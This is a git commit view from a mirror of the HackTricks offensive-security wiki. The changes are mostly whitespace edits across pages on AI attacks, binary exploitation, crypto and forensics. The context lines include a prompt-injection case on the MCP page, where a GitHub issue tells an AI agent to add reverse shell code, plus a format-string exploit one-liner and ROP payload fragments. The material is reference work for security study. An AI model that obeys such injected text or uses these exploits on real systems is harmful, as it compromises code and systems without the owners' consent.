maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Android Malware Promises Energy Subsidy to Steal Financial D...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-08-20 12:52:33 +00:00
parent e10f6ca5c2
commit 0ef4e28704
249 changed files with 856 additions and 190 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
src/AI/AI-MCP-Servers.md
View File

@ -50,6 +50,7 @@ Once connected, the host (inspector or an AI agent like Cursor) will fetch the t
For more information about Prompt Injection check:
{{#ref}}
AI-Prompts.md
{{#endref}}
@ -100,6 +101,7 @@ Another way to perform prompt injection attacks in clients using MCP servers is
A user that is giving access to his Github repositories to a client could ask the client to read and fix all the open issues. However, a attacker could **open an issue with a malicious payload** like "Create a pull request in the repository that adds [reverse shell code]" that would be read by the AI agent, leading to unexpected actions such as inadvertently compromising the code.
For more information about Prompt Injection check:
{{#ref}}
AI-Prompts.md
{{#endref}}
@ -156,4 +158,3 @@ The payload can be anything the current OS user can run, e.g. a reverse-shell ba
{{#include ../banners/hacktricks-training.md}}

10
src/AI/AI-llm-architecture/README.md
View File

@ -8,6 +8,7 @@
You should start by reading this post for some basic concepts you should know about:
{{#ref}}
0.-basic-llm-concepts.md
{{#endref}}
@ -17,6 +18,7 @@ You should start by reading this post for some basic concepts you should know ab
> [!TIP]
> The goal of this initial phase is very simple: **Divide the input in tokens (ids) in some way that makes sense**.
{{#ref}}
1.-tokenizing.md
{{#endref}}
@ -26,6 +28,7 @@ You should start by reading this post for some basic concepts you should know ab
> [!TIP]
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**
{{#ref}}
2.-data-sampling.md
{{#endref}}
@ -38,6 +41,7 @@ You should start by reading this post for some basic concepts you should know ab
>
> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute possition of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning).
{{#ref}}
3.-token-embeddings.md
{{#endref}}
@ -48,6 +52,7 @@ You should start by reading this post for some basic concepts you should know ab
> The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.
{{#ref}}
4.-attention-mechanisms.md
{{#endref}}
@ -59,6 +64,7 @@ You should start by reading this post for some basic concepts you should know ab
>
> This architecture will be used for both, training and predicting text after it was trained.
{{#ref}}
5.-llm-architecture.md
{{#endref}}
@ -68,6 +74,7 @@ You should start by reading this post for some basic concepts you should know ab
> [!TIP]
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.
{{#ref}}
6.-pre-training-and-loading-models.md
{{#endref}}
@ -77,6 +84,7 @@ You should start by reading this post for some basic concepts you should know ab
> [!TIP]
> The use of **LoRA reduce a lot the computation** needed to **fine tune** already trained models.
{{#ref}}
7.0.-lora-improvements-in-fine-tuning.md
{{#endref}}
@ -86,6 +94,7 @@ You should start by reading this post for some basic concepts you should know ab
> [!TIP]
> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not).
{{#ref}}
7.1.-fine-tuning-for-classification.md
{{#endref}}
@ -95,6 +104,7 @@ You should start by reading this post for some basic concepts you should know ab
> [!TIP]
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
{{#ref}}
7.2.-fine-tuning-to-follow-instructions.md
{{#endref}}

10
src/AI/README.md
View File

@ -6,18 +6,22 @@
The best starting point to learn about AI is to understand how the main machine learning algorithms work. This will help you to understand how AI works, how to use it and how to attack it:
{{#ref}}
./AI-Supervised-Learning-Algorithms.md
{{#endref}}
{{#ref}}
./AI-Unsupervised-Learning-Algorithms.md
{{#endref}}
{{#ref}}
./AI-Reinforcement-Learning-Algorithms.md
{{#endref}}
{{#ref}}
./AI-Deep-Learning.md
{{#endref}}
@ -26,6 +30,7 @@ The best starting point to learn about AI is to understand how the main machine
In the following page you will find the basics of each component to build a basic LLM using transformers:
{{#ref}}
AI-llm-architecture/README.md
{{#endref}}
@ -36,6 +41,7 @@ AI-llm-architecture/README.md
At this moment, the main 2 frameworks to assess the risks of AI systems are the OWASP ML Top 10 and the Google SAIF:
{{#ref}}
AI-Risk-Frameworks.md
{{#endref}}
@ -44,6 +50,7 @@ AI-Risk-Frameworks.md
LLMs have made the use of AI explode in the last years, but they are not perfect and can be tricked by adversarial prompts. This is a very important topic to understand how to use AI safely and how to attack it:
{{#ref}}
AI-Prompts.md
{{#endref}}
@ -52,6 +59,7 @@ AI-Prompts.md
It's very common to developers and companies to run models downloaded from the Internet, however just loading a model might be enough to execute arbitrary code on the system. This is a very important topic to understand how to use AI safely and how to attack it:
{{#ref}}
AI-Models-RCE.md
{{#endref}}
@ -60,12 +68,14 @@ AI-Models-RCE.md
MCP (Model Context Protocol) is a protocol that allows AI agent clients to connect with external tools and data sources in a plug-and-play fashion. This enables complex workflows and interactions between AI models and external systems:
{{#ref}}
AI-MCP-Servers.md
{{#endref}}
### AI-Assisted Fuzzing & Automated Vulnerability Discovery
{{#ref}}
AI-Assisted-Fuzzing-and-Vulnerability-Discovery.md
{{#endref}}

2
src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
View File

@ -10,6 +10,7 @@ To call malloc it's possible to wait for the program to call it or by **calling
More info about One Gadget in:
{{#ref}}
../rop-return-oriented-programing/ret2lib/one-gadget.md
{{#endref}}
@ -21,6 +22,7 @@ More info about One Gadget in:
This was abused in one of the example from the page abusing a fast bin attack after having abused an unsorted bin attack:
{{#ref}}
../libc-heap/unsorted-bin-attack.md
{{#endref}}

3
src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
View File

@ -62,6 +62,7 @@ Moreover, if `puts` is used with user input, it's possible to overwrite the `str
## **One Gadget**
{{#ref}}
../rop-return-oriented-programing/ret2lib/one-gadget.md
{{#endref}}
@ -77,6 +78,7 @@ It's possible to find an [**example here**](https://ctf-wiki.mahaloz.re/pwn/linu
The **Full RELRO** protection is meant to protect agains this kind of technique by resolving all the addresses of the functions when the binary is started and making the **GOT table read only** after it:
{{#ref}}
../common-binary-protections-and-bypasses/relro.md
{{#endref}}
@ -89,4 +91,3 @@ The **Full RELRO** protection is meant to protect agains this kind of technique
{{#include ../../banners/hacktricks-training.md}}

4
src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
View File

@ -6,12 +6,14 @@
Before start exploiting anything it's interesting to understand part of the structure of an **ELF binary**:
{{#ref}}
elf-tricks.md
{{#endref}}
## Exploiting Tools
{{#ref}}
tools/
{{#endref}}
@ -34,6 +36,7 @@ There are different was you could end controlling the flow of a program:
You can find the **Write What Where to Execution** techniques in:
{{#ref}}
../arbitrary-write-2-exec/
{{#endref}}
@ -111,4 +114,3 @@ Something to take into account is that usually **just one exploitation of a vuln
{{#include ../../banners/hacktricks-training.md}}

7
src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md
View File

@ -68,6 +68,7 @@ This stores vendor metadata information about the binary.
- On x86-64, `readelf -n` will show `GNU_PROPERTY_X86_FEATURE_1_*` flags inside `.note.gnu.property`. If you see `IBT` and/or `SHSTK`, the binary was built with CET (Indirect Branch Tracking and/or Shadow Stack). This impacts ROP/JOP because indirect branch targets must start with an `ENDBR64` instruction and returns are checked against a shadow stack. See the CET page for details and bypass notes.
{{#ref}}
../common-binary-protections-and-bypasses/cet-and-shadow-stack.md
{{#endref}}
@ -92,6 +93,7 @@ Note that RELRO can be partial or full, the partial version do not protect the s
> For exploitation techniques and up-to-date bypass notes, check the dedicated page:
{{#ref}}
../common-binary-protections-and-bypasses/relro.md
{{#endref}}
@ -372,7 +374,8 @@ So when a program calls to malloc, it actually calls the corresponding location
- `-z now` (Full RELRO) disables lazy binding; PLT entries still exist but GOT/PLT is mapped read-only, so techniques like **GOT overwrite** and **ret2dlresolve** wont work against the main binary (libraries may still be partially RELRO). See:
{{#ref}}
{{#ref}}
../common-binary-protections-and-bypasses/relro.md
{{#endref}}
@ -382,6 +385,7 @@ So when a program calls to malloc, it actually calls the corresponding location
> If GOT/PLT is not an option, pivot to other writeable code-pointers or use classic ROP/SROP into libc.
{{#ref}}
../arbitrary-write-2-exec/aw2exec-got-plt.md
{{#endref}}
@ -432,6 +436,7 @@ Moreover, it's also possible to have a **`PREINIT_ARRAY`** with **pointers** tha
- For lazy binding abuse of the dynamic linker to resolve arbitrary symbols at runtime, see the dedicated page:
{{#ref}}
../rop-return-oriented-programing/ret2dlresolve.md
{{#endref}}

5
src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
View File

@ -210,6 +210,7 @@ p.interactive()
Abusing a buffer overflow it would be possible to exploit a **ret2plt** to exfiltrate an address of a function from the libc. Check:
{{#ref}}
ret2plt.md
{{#endref}}
@ -231,6 +232,7 @@ payload += p32(elf.symbols['main'])
You can find more info about Format Strings arbitrary read in:
{{#ref}}
../../format-strings/
{{#endref}}
@ -239,6 +241,7 @@ You can find more info about Format Strings arbitrary read in:
Try to bypass ASLR abusing addresses inside the stack:
{{#ref}}
ret2ret.md
{{#endref}}
@ -297,6 +300,7 @@ gef➤ x/4i 0xffffffffff600800
Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized. For more info check:
{{#ref}}
../../rop-return-oriented-programing/ret2vdso.md
{{#endref}}
@ -304,4 +308,3 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t
{{#include ../../../banners/hacktricks-training.md}}

2
src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md
View File

@ -19,6 +19,7 @@ In order to bypass PIE it's needed to **leak some address of the loaded** binary
- Be **given** the leak (common in easy CTF challenges, [**check this example**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit))
- **Brute-force EBP and EIP values** in the stack until you leak the correct ones:
{{#ref}}
bypassing-canary-and-pie.md
{{#endref}}
@ -32,4 +33,3 @@ bypassing-canary-and-pie.md
{{#include ../../../banners/hacktricks-training.md}}

4
src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md
View File

@ -33,12 +33,14 @@ In `x86` binaries, the canary cookie is a **`0x4`** byte dword. The f**irst thre
- If the **canary is forked in child processes** it might be possible to **brute-force** it one byte at a time:
{{#ref}}
bf-forked-stack-canaries.md
{{#endref}}
- If there is some interesting **leak or arbitrary read vulnerability** in the binary it might be possible to leak it:
{{#ref}}
print-stack-canary.md
{{#endref}}
@ -47,6 +49,7 @@ print-stack-canary.md
The stack vulnerable to a stack overflow might **contain addresses to strings or functions that can be overwritten** in order to exploit the vulnerability without needing to reach the stack canary. Check:
{{#ref}}
../../stack-overflow/pointer-redirecting.md
{{#endref}}
@ -76,4 +79,3 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/
{{#include ../../../banners/hacktricks-training.md}}

2
src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
View File

@ -23,6 +23,7 @@ Obviously, this tactic is very **restricted** as the attacker needs to be able t
With an **arbitrary read** like the one provided by format **strings** it might be possible to leak the canary. Check this example: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) and you can read about abusing format strings to read arbitrary memory addresses in:
{{#ref}}
../../format-strings/
{{#endref}}
@ -33,4 +34,3 @@ With an **arbitrary read** like the one provided by format **strings** it might
{{#include ../../../banners/hacktricks-training.md}}

3
src/binary-exploitation/format-strings/README.md
View File

@ -168,6 +168,7 @@ Therefore, this vulnerability allows to **write anything in any address (arbitra
In this example, the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Although this could abuse other arbitrary write to exec techniques:
{{#ref}}
../arbitrary-write-2-exec/
{{#endref}}
@ -196,6 +197,7 @@ python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "
You can find a **template** to prepare a exploit for this kind of vulnerability in:
{{#ref}}
format-strings-template.md
{{#endref}}
@ -241,4 +243,3 @@ It's possible to abuse the write actions of a format string vulnerability to **w
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/libc-heap/README.md
View File

@ -513,6 +513,7 @@ and inside of it some chunks can be found:
Check what are the bins and how are they organized and how memory is allocated and freed in:
{{#ref}}
bins-and-memory-allocations.md
{{#endref}}
@ -521,6 +522,7 @@ bins-and-memory-allocations.md
Functions involved in heap will perform certain check before performing its actions to try to make sure the heap wasn't corrupted:
{{#ref}}
heap-memory-functions/heap-functions-security-checks.md
{{#endref}}

4
src/binary-exploitation/libc-heap/bins-and-memory-allocations.md
View File

@ -610,6 +610,7 @@ When malloc is used and a chunk is divided (from the unsorted bin or from the to
Check out:
{{#ref}}
heap-memory-functions/malloc-and-sysmalloc.md
{{#endref}}
@ -618,6 +619,7 @@ heap-memory-functions/malloc-and-sysmalloc.md
Check out:
{{#ref}}
heap-memory-functions/free.md
{{#endref}}
@ -626,6 +628,7 @@ heap-memory-functions/free.md
Check the security checks performed by heavily used functions in heap in:
{{#ref}}
heap-memory-functions/heap-functions-security-checks.md
{{#endref}}
@ -640,4 +643,3 @@ heap-memory-functions/heap-functions-security-checks.md
{{#include ../../banners/hacktricks-training.md}}

3
src/binary-exploitation/libc-heap/fast-bin-attack.md
View File

@ -6,6 +6,7 @@
For more information about what is a fast bin check this page:
{{#ref}}
bins-and-memory-allocations.md
{{#endref}}
@ -146,6 +147,7 @@ int main(void)
- Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
- Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
{{#ref}}
unsorted-bin-attack.md
{{#endref}}
@ -153,4 +155,3 @@ unsorted-bin-attack.md
{{#include ../../banners/hacktricks-training.md}}

4
src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md
View File

@ -6,6 +6,7 @@
For more info check:
{{#ref}}
unlink.md
{{#endref}}
@ -23,6 +24,7 @@ This is a summary of the performed checks:
For more info check:
{{#ref}}
malloc-and-sysmalloc.md
{{#endref}}
@ -94,6 +96,7 @@ malloc-and-sysmalloc.md
For more info check:
{{#ref}}
free.md
{{#endref}}
@ -163,4 +166,3 @@ free.md
{{#include ../../../banners/hacktricks-training.md}}

2
src/binary-exploitation/libc-heap/house-of-roman.md
View File

@ -75,6 +75,7 @@ uint8_t* malloc_hook_chunk = malloc(0x60);
For more info you can check:
{{#ref}}
unsorted-bin-attack.md
{{#endref}}
@ -118,4 +119,3 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/libc-heap/large-bin-attack.md
View File

@ -6,6 +6,7 @@
For more information about what is a large bin check this page:
{{#ref}}
bins-and-memory-allocations.md
{{#endref}}
@ -58,4 +59,3 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/libc-heap/tcache-bin-attack.md
View File

@ -6,6 +6,7 @@
For more information about what is a Tcache bin check this page:
{{#ref}}
bins-and-memory-allocations.md
{{#endref}}
@ -47,4 +48,3 @@ Usually it's possible to find at the beginning of the heap a chunk containing th
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/libc-heap/unsorted-bin-attack.md
View File

@ -6,6 +6,7 @@
For more information about what is an unsorted bin check this page:
{{#ref}}
bins-and-memory-allocations.md
{{#endref}}
@ -73,4 +74,3 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/libc-heap/use-after-free/README.md
View File

@ -13,6 +13,7 @@ The problem here is that it's not ilegal (there **won't be errors**) when a **fr
A first fit attack targets the way some memory allocators, like in glibc, manage freed memory. When you free a block of memory, it gets added to a list, and new memory requests pull from that list from the end. Attackers can use this behavior to manipulate **which memory blocks get reused, potentially gaining control over them**. This can lead to "use-after-free" issues, where an attacker could **change the contents of memory that gets reallocated**, creating a security risk.\
Check more info in:
{{#ref}}
first-fit.md
{{#endref}}
@ -20,4 +21,3 @@ first-fit.md
{{#include ../../../banners/hacktricks-training.md}}

5
src/binary-exploitation/rop-return-oriented-programing/README.md
View File

@ -152,6 +152,7 @@ In this example:
Check the following page for this information:
{{#ref}}
../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
@ -168,18 +169,21 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in
- **Ret2lib**: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like `system('/bin/sh')`.
{{#ref}}
ret2lib/
{{#endref}}
- **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
{{#ref}}
rop-syscall-execv/
{{#endref}}
- **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).
{{#ref}}
../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
{{#endref}}
@ -195,4 +199,3 @@ rop-syscall-execv/
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
View File

@ -79,6 +79,7 @@ Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by acc
Check this page for more info:
{{#ref}}
brop-blind-return-oriented-programming.md
{{#endref}}
@ -184,4 +185,3 @@ Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protec
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
View File

@ -17,6 +17,7 @@ Usually, all these structures are faked by making an **initial ROP chain that ca
Chek this video for a nice explanation about this technique in the second half of the video:
{{#ref}}
https://youtu.be/ADULSwnQs-s?feature=shared
{{#endref}}
@ -197,4 +198,3 @@ target.interactive()
- 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`.
{{#include ../../banners/hacktricks-training.md}}

7
src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
View File

@ -61,12 +61,14 @@ In this case it is loaded in **0xb75dc000** (This will be the base address of li
It might be possible that you **don't know the libc the binary is loading** (because it might be located in a server where you don't have any access). In that case you could abuse the vulnerability to **leak some addresses and find which libc** library is being used:
{{#ref}}
rop-leaking-libc-address/
{{#endref}}
And you can find a pwntools template for this in:
{{#ref}}
rop-leaking-libc-address/rop-leaking-libc-template.md
{{#endref}}
@ -91,6 +93,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
Execute a shell just jumping to **one** specific **address** in libc:
{{#ref}}
one-gadget.md
{{#endref}}
@ -119,6 +122,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
Check the example from:
{{#ref}}
../
{{#endref}}
@ -131,6 +135,7 @@ Also in ARM64 an instruction does what the instruction does (it's not possible t
Check the example from:
{{#ref}}
ret2lib-+-printf-leak-arm64.md
{{#endref}}
@ -143,6 +148,7 @@ This allows to **leak information from the process** by calling `printf`/`puts`
This basically means abusing a **Ret2lib to transform it into a `printf` format strings vulnerability** by using the `ret2lib` to call printf with the values to exploit it (sounds useless but possible):
{{#ref}}
../../format-strings/
{{#endref}}
@ -165,4 +171,3 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format
{{#include ../../../banners/hacktricks-training.md}}

3
src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
View File

@ -38,6 +38,7 @@ gcc -o vuln vuln.c -fno-stack-protector -no-pie
Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
{{#ref}}
rop-leaking-libc-template.md
{{#endref}}
@ -265,6 +266,7 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100
You can find a template to exploit this vulnerability here:
{{#ref}}
rop-leaking-libc-template.md
{{#endref}}
@ -304,4 +306,3 @@ BINSH = next(libc.search("/bin/sh")) - 64
{{#include ../../../../banners/hacktricks-training.md}}

2
src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md
View File

@ -62,6 +62,7 @@ pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd
After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page:
{{#ref}}
srop-sigreturn-oriented-programming/srop-arm64.md
{{#endref}}
@ -69,4 +70,3 @@ srop-sigreturn-oriented-programming/srop-arm64.md
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
View File

@ -110,6 +110,7 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx
If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
{{#ref}}
../srop-sigreturn-oriented-programming/
{{#endref}}
@ -195,4 +196,3 @@ target.interactive()
{{#include ../../../banners/hacktricks-training.md}}

3
src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
View File

@ -4,6 +4,7 @@
Find an introduction to arm64 in:
{{#ref}}
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
@ -12,6 +13,7 @@ Find an introduction to arm64 in:
We are going to use the example from the page:
{{#ref}}
../../stack-overflow/ret2win/ret2win-arm64.md
{{#endref}}
@ -128,4 +130,3 @@ p.interactive()
{{#include ../../../banners/hacktricks-training.md}}

3
src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
View File

@ -15,6 +15,7 @@ The interesting part is how **`sigreturn`** restores the program's state: it doe
Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
{{#ref}}
../rop-syscall-execv/
{{#endref}}
@ -59,6 +60,7 @@ If you are curious this is the **sigcontext structure** stored in the stack to l
For a better explanation check also:
{{#ref}}
https://youtu.be/ADULSwnQs-s?feature=shared
{{#endref}}
@ -145,4 +147,3 @@ target.interactive()
- SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed.
{{#include ../../../banners/hacktricks-training.md}}

2
src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
View File

@ -179,12 +179,14 @@ p.interactive()
For more info about vdso check:
{{#ref}}
../ret2vdso.md
{{#endref}}
And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info:
{{#ref}}
../../common-binary-protections-and-bypasses/aslr/
{{#endref}}

6
src/binary-exploitation/stack-overflow/README.md
View File

@ -65,6 +65,7 @@ However, in other scenarios maybe just **overwriting some variables values in th
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called:
{{#ref}}
ret2win/
{{#endref}}
@ -73,6 +74,7 @@ ret2win/
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
{{#ref}}
stack-shellcode/
{{#endref}}
@ -81,6 +83,7 @@ stack-shellcode/
This technique is the fundamental framework to bypass the main protection to the previous technique: **No executable stack (NX)**. And it allows to perform several other techniques (ret2lib, ret2syscall...) that will end executing arbitrary commands by abusing existing instructions in the binary:
{{#ref}}
../rop-return-oriented-programing/
{{#endref}}
@ -89,6 +92,7 @@ This technique is the fundamental framework to bypass the main protection to the
An overflow is not always going to be in the stack, it could also be in the **heap** for example:
{{#ref}}
../libc-heap/heap-overflow.md
{{#endref}}
@ -97,6 +101,7 @@ An overflow is not always going to be in the stack, it could also be in the **he
There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
{{#ref}}
../common-binary-protections-and-bypasses/
{{#endref}}
@ -201,4 +206,3 @@ Lessons learned:
{{#include ../../banners/hacktricks-training.md}}

2
src/binary-exploitation/stack-overflow/ret2win/README.md
View File

@ -108,6 +108,7 @@ The Python script sends a carefully crafted message that, when processed by the
## ARM64 Example
{{#ref}}
ret2win-arm64.md
{{#endref}}
@ -115,4 +116,3 @@ ret2win-arm64.md
{{#include ../../../banners/hacktricks-training.md}}

2
src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
View File

@ -4,6 +4,7 @@
Find an introduction to arm64 in:
{{#ref}}
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
@ -189,4 +190,3 @@ p.close()
{{#include ../../../banners/hacktricks-training.md}}

3
src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
View File

@ -196,6 +196,7 @@ xchg <reg>, rsp
Check the ret2esp technique here:
{{#ref}}
../rop-return-oriented-programing/ret2esp-ret2reg.md
{{#endref}}
@ -234,6 +235,7 @@ Modern x86 CPUs and OSes increasingly deploy **CET Shadow Stack (SHSTK)**. With
- For background and deeper details see:
{{#ref}}
../common-binary-protections-and-bypasses/cet-and-shadow-stack.md
{{#endref}}
@ -287,6 +289,7 @@ Therefore, by default, just abusing the epilogue you **won't be able to control
Also in the following page you can see the equivalent of **Ret2esp in ARM64**:
{{#ref}}
../rop-return-oriented-programing/ret2esp-ret2reg.md
{{#endref}}

2
src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md
View File

@ -4,6 +4,7 @@
Find an introduction to arm64 in:
{{#ref}}
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
@ -81,4 +82,3 @@ I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real
{{#include ../../../banners/hacktricks-training.md}}

2
src/crypto-and-stego/esoteric-languages.md
View File

@ -52,6 +52,7 @@ Take it to the top
Whisper my world
```
{{#ref}}
https://codewithrockstar.com/
{{#endref}}
@ -69,4 +70,3 @@ Kukarek
```
{{#include ../banners/hacktricks-training.md}}

2
src/crypto-and-stego/hash-length-extension-attack.md
View File

@ -29,6 +29,7 @@ If an attacker wants to append the string "append" he can:
### **Tool**
{{#ref}}
https://github.com/iagox86/hash_extender
{{#endref}}
@ -38,4 +39,3 @@ https://github.com/iagox86/hash_extender
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
{{#include ../banners/hacktricks-training.md}}

3
src/crypto-and-stego/rc4-encrypt-and-decrypt.md
View File

@ -6,13 +6,14 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

13
src/generic-methodologies-and-resources/basic-forensic-methodology/README.md
View File

@ -4,6 +4,7 @@
## Creating and Mounting an Image
{{#ref}}
../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
{{#endref}}
@ -12,6 +13,7 @@
This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
{{#ref}}
malware-analysis.md
{{#endref}}
@ -20,20 +22,24 @@ malware-analysis.md
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
{{#ref}}
partitions-file-systems-carving/
{{#endref}}
Depending on the used OSs and even platform different interesting artifacts should be searched:
{{#ref}}
windows-forensics/
{{#endref}}
{{#ref}}
linux-forensics.md
{{#endref}}
{{#ref}}
docker-forensics.md
{{#endref}}
@ -43,24 +49,28 @@ docker-forensics.md
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
Read the following page to learn some interesting tricks:
{{#ref}}
specific-software-file-type-tricks/
{{#endref}}
I want to do a special mention to the page:
{{#ref}}
specific-software-file-type-tricks/browser-artifacts.md
{{#endref}}
## Memory Dump Inspection
{{#ref}}
memory-dump-analysis/
{{#endref}}
## Pcap Inspection
{{#ref}}
pcap-inspection/
{{#endref}}
@ -69,12 +79,14 @@ pcap-inspection/
Keep in mind the possible use of anti-forensic techniques:
{{#ref}}
anti-forensic-techniques.md
{{#endref}}
## Threat Hunting
{{#ref}}
file-integrity-monitoring.md
{{#endref}}
@ -82,4 +94,3 @@ file-integrity-monitoring.md
{{#include ../../banners/hacktricks-training.md}}

2
src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
View File

@ -155,6 +155,7 @@ Linux offers tools for ensuring the integrity of system components, crucial for
Read the following page to learn about tools that can be useful to find malware:
{{#ref}}
malware-analysis.md
{{#endref}}
@ -399,4 +400,3 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/

4
